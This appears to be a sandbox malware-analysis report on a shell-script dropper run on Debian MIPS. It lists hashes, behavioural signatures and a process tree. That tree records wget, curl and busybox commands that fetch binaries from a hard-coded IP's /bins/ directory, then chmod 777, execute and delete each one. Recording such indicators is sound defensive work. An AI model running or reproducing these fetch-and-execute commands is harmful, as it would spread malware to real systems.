Analysis
-
max time kernel
78s -
max time network
80s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/11/2024, 03:04
Static task
static1
Behavioral task
behavioral1
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh
-
Size
10KB
-
MD5
21babea83b818a044ea8aa5448fcb3cb
-
SHA1
20cd57f2ec215de9679cbe64954812f7b0aa6107
-
SHA256
e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855
-
SHA512
9c33a7cffe538e0624283146cb4c8ebcfd96e23282a4a1010138d0a83b9671b0b1607c10c3aae2d1c377ca63d5e06b8ea22d358d53d7bd8626d1f576d863b1a8
-
SSDEEP
96:nM/LbT0AbObHbjbfLb6bybIBhw31aADk/kbkTkikCkefhG3NahCk/kbkTkikCka0:nqOLPHOuMBilaAsObLPHOu5
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 877 chmod 901 chmod 919 chmod 973 chmod 991 chmod 807 chmod 856 chmod 979 chmod 814 chmod 925 chmod 967 chmod 751 chmod 759 chmod 889 chmod 895 chmod 931 chmod 949 chmod 955 chmod 834 chmod 883 chmod 937 chmod 871 chmod 907 chmod 985 chmod 943 chmod 961 chmod 862 chmod 913 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr 752 pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr /tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto 761 HN4zjtbqzr238vxIimKIC09iW0vBbLjgto /tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT 808 qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT /tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C 815 tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C /tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 836 kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 /tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD 857 JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD /tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX 863 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX /tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL 872 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL /tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J 878 LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J /tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 884 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 /tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY 890 ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY /tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb 896 QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb /tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 902 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 /tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 908 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 /tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD 914 JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD /tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX 920 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX /tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL 926 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL /tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J 932 LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J /tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 938 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 /tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY 944 ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY /tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb 950 QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb /tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 956 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 /tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 962 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 /tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr 968 pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr /tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto 974 HN4zjtbqzr238vxIimKIC09iW0vBbLjgto /tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT 980 qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT /tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C 986 tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C /tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 992 kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J curl File opened for modification /tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT curl File opened for modification /tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 curl File opened for modification /tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD curl File opened for modification /tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY curl File opened for modification /tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 curl File opened for modification /tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX curl File opened for modification /tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr curl File opened for modification /tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto curl File opened for modification /tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL curl File opened for modification /tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J curl File opened for modification /tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 curl File opened for modification /tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD curl File opened for modification /tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb curl File opened for modification /tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL curl File opened for modification /tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY curl File opened for modification /tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 curl File opened for modification /tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C curl File opened for modification /tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX curl File opened for modification /tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4 curl File opened for modification /tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C curl File opened for modification /tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2 curl File opened for modification /tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb curl File opened for modification /tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1 curl File opened for modification /tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto curl File opened for modification /tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT curl File opened for modification /tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr curl File opened for modification /tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8 curl
Processes
-
/tmp/e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh/tmp/e1617ef99f09c96979997e1964d7d97b1a3d89e1625a6b8746176c825fdaa855.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:725
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:749
-
-
/bin/chmodchmod 777 pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr./pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:754
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:756
-
-
/bin/chmodchmod 777 HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto./HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:765
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:766
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:802
-
-
/bin/chmodchmod 777 qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT./qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:810
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:811
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:813
-
-
/bin/chmodchmod 777 tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C./tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:816
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:817
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:829
-
-
/bin/chmodchmod 777 kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2./kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:840
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:841
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:855
-
-
/bin/chmodchmod 777 JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD./JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:858
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:859
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:861
-
-
/bin/chmodchmod 777 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX./0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:864
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:865
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:870
-
-
/bin/chmodchmod 777 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL./2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:876
-
-
/bin/chmodchmod 777 LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J./LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:882
-
-
/bin/chmodchmod 777 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4./7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:885
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:886
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:888
-
-
/bin/chmodchmod 777 ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY./ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:891
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:892
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:894
-
-
/bin/chmodchmod 777 QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb./QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:897
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:898
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:900
-
-
/bin/chmodchmod 777 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1./6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:903
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:904
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:906
-
-
/bin/chmodchmod 777 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8./0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:909
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:910
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:912
-
-
/bin/chmodchmod 777 JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD./JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm JICjR9wAOhA3GsPWBMdDUqQ92J7k5jWUuD2⤵PID:915
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:916
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:918
-
-
/bin/chmodchmod 777 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX./0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 0zxveDxZt2CY71VSBa3zBcY4Uqc82fkwKX2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:922
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:924
-
-
/bin/chmodchmod 777 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL./2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 2jrdgU9rSuSMjrQmqB27y6bMc0iy3X83dL2⤵PID:927
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:928
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:930
-
-
/bin/chmodchmod 777 LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J./LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm LWMXSGcNZ48Su0CnvzZ8S1B9Qy0eqQiU6J2⤵PID:933
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:934
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:936
-
-
/bin/chmodchmod 777 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v4./7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 7Bt3ezdsHejrsR3xEySuQjHJTaRIifr3v42⤵PID:939
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:940
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:942
-
-
/bin/chmodchmod 777 ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY./ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm ZKXb9vQt5Ww28olxUDnXxtcDQ9HewQISSY2⤵PID:945
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:946
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:948
-
-
/bin/chmodchmod 777 QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb./QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵
- Executes dropped EXE
PID:950
-
-
